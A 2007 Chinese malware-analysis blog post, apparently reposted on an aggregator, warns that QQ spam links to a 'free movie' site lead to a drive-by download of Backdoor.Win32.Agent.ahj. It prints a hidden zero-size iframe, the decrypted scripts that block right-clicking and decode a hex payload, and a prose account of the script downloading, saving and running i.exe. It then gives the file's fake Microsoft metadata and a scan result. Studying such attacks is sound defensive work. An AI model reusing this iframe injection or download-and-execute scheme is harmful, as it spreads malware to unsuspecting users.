小心QQ信息的网址传播 Backdoor.Win32.Agent.ahj
来源:互联网 发布:淘宝介入要买家举证吗 编辑:程序博客网 时间:2024/05/16 05:30
endurer 原创
2007-03-13 第1版
QQ接到如下信息:
/---
刚发现的一个免费在线电影站,大量的激情N级片哦,观看速度还挺快的!hxxp://p2p.m***m1**6*8***.info
---/
hxxp://p2p.m***m1**6*8***.info/首页包含代码:
/---
<iframe src="hxxp://sms.e***es***ms*s.com/m***.html" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://sms.e***es***ms*s.com/m***.html 包含有使用 CryptHTML XP(Unregistered Version) 加密的JavaScript脚本代码。
解密后的内容包含一段JavaScript脚本代码和一段VBScript脚本代码。
JavaScript脚本代码为:
/---
wC96=2956;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};vP56=4099;cX26=958;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();aK86=2101;cO98=7242;tY3=100;eR10=2383;eX7=8673;;_licensed_to_="";
---/
主要功能是定义了一些的变量并赋值,同时禁用鼠标右键。
VBScript脚本代码中的变量uurl的值已暴露了所要下载的恶意文件的URL为另一网站上的i.exe。
但其具体的下载和运行方法保存在变量S中。
变量S的值由代码
/---
D=""
DO WHILE LEN(S)>1
k="&H"+LEFT(S,2)
p=CLng(k)
m=chr(p)
D=D&m
S=MID(S,3)
LOOP
---/
来解密。
解密出来的S的值为一段VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 i.exe,保存为 %temp%/pe.exe,创建内容为:Shell.ShellExecute """+%temp%/pe.exe+""","""","""",""open"",0"的文件pe.vbs,并用Q.ShellExecute来执行,从而运行pe.exe。
并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : d:/test/i.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : ASN.2 Runtime APIs
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-3-12 22:46:57
修改时间 : 2007-3-12 22:46:58
访问时间 : 2007-3-12 0:0:0
大小 : 19498 字节 19.42 KB
MD5 : 4d6df04ad8aaaa7537a9253b563b2d35
居然冒充微软的文件……
Scanned file: i.exe - Infected
i.exe - infected by Backdoor.Win32.Agent.ahjStatistics:
Known viruses: 280806 Updated: 12-03-2007 File size (Kb): 20 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0
- 小心QQ信息的网址传播 Backdoor.Win32.Agent.ahj
- Backdoor.Win32.Agent.ahj(backdoor.agent.ahj
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 免费刷会员和六钻工具?小心通过QQ传播的灰鸽子Backdoor.Win32.Gpigeon.gem
- 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
- 03-29/小心QQ信息中的网址传播Trojan-PSW.Win32.Delf.qc/Trojan.PSW.Liumazi.kr(2版)
- 木马Trojan.Agent.ace 通过QQ信息中的网址传播
- 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
- ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaa
- 盗取QQ密码的Trojan.PSW.QQPass.rky正通过QQ信息中的网址传播
- 遭遇 Backdoor.Win32.Agent.amb / serivces.exe
- 小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv等
- 小心传播Trojan-GameThief.Win32.OnLineGames.smoh的电子邮件
- 一个传播Trojan.Win32.Agent.aac的网站
- 遭遇Worm.Win32.Agent.o、Backdoor.Win32.SnooperYb.b等
- 遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
- 遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等2
- 遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等3
- Rapidshare Pack 2007 (9 Tools Package)
- 导出oracle数据库
- error C2065: '_beginthread' : undeclared identifier
- 构建用户友好的web软件之删除数据
- 对象持久话和对象关系映射ORM技术
- 小心QQ信息的网址传播 Backdoor.Win32.Agent.ahj
- Jufsoft BadCopy Pro v3.81 build 0306
- 郁闷湖上被宰的文章: 仰恩大学评估+废CET !
- Fundamentals of Physics by David Halliday
- linux下出现NoClassDefFoundError解决方案
- 简单的Tab选项卡
- 轻松实现Apache,Tomcat集群和负载均衡
- NOD32 2.70.32 Full ( Информация по инсталяции + Фикс + Обновления )
- SharpDevelop设计模式(Decorator)
